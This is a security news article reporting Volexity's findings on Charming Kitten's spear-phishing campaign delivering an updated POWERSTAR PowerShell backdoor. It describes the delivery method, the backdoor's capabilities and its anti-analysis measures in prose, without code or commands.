Charming Kitten, a nation-state actor affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), has been linked to a bespoke spear-phishing campaign delivering the latest version of a full-featured PowerShell backdoor called POWERSTAR.
“There have been enhanced operational security measures placed in the malware to make it more difficult to analyze and gather intelligence,” Volexity researchers Ankur Saini and Charlie Gardner. said in a report published this week.
Threat actors are experts at using social engineering to lure targets, often creating customized fake personas on social media platforms and engaging in ongoing conversations to build rapport before posting malicious links. It is also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda.
The recent intrusion orchestrated by Charming Kitten has used other implants such as PowerLess and BellaCiao, suggesting that the group is using a suite of available espionage tools to realize its strategic goals.
POWERSTAR is another addition to the group’s arsenal. Also called CharmPower, the backdoor was first publicly documented by Check Point in January 2022, exposing its use in connection with an attack that weaponizes the Log4Shell vulnerability in publicly exposed Java applications.
It has since been used in at least two other campaigns, as documented by PwC in July 2022 and Microsoft in April 2023.
Volexity, which detected a base variant of POWERSTAR in 2021 distributed by malicious macros embedded in DOCM files, says that the May 2023 attack wave leveraged LNK files inside password-protected RAR files to download backdoors from Backblaze, while taking steps to hinder analysis .
“With POWERSTAR, Charming Kitten seeks to limit the risk of exposing their malware to analysis and detection by sending the decryption method separately from the initial code and never writing it to disk,” the researchers said.
“This has the added bonus of acting as an operational guardrail, as separating the decryption method from the command-and-control (C2) server prevents future successful decryption of the corresponding POWERSTAR payload.”
Backdoor comes with an extensive feature set that allows it to remotely execute PowerShell and C# commands, set persistence, collect system information, and download and run more modules to enumerate running processes, capture screenshots, search for files that match a specific extension, and monitor if the persistence component is intact.
Also improved and extended from previous versions is a cleanup module designed to remove all traces of malware as well as removing persistence-related registry keys. This update demonstrates Charming Kitten’s continued efforts to perfect her technique and avoid detection.
Volexity said it also detected a different variant of POWERSTAR attempting to take hard-coded C2 servers by decoding files stored on the decentralized InterPlanetary File System (IPFS), signaling an attempt to make its attack infrastructure more resilient.
This development coincided with the use of a previously undocumented MuddyWater (aka Static Kitten) command-and-control (C2) framework called PhonyC2 to deliver malicious payloads to compromised hosts.
“The common phishing manual used by Charming Kitten and POWERSTAR’s overall goals remain consistent,” the researchers said. “References to persistence mechanisms and executable payloads in the POWERSTAR Cleanup module strongly suggest the broader set of tools used by Charming Kitten to perform malware-supporting espionage.”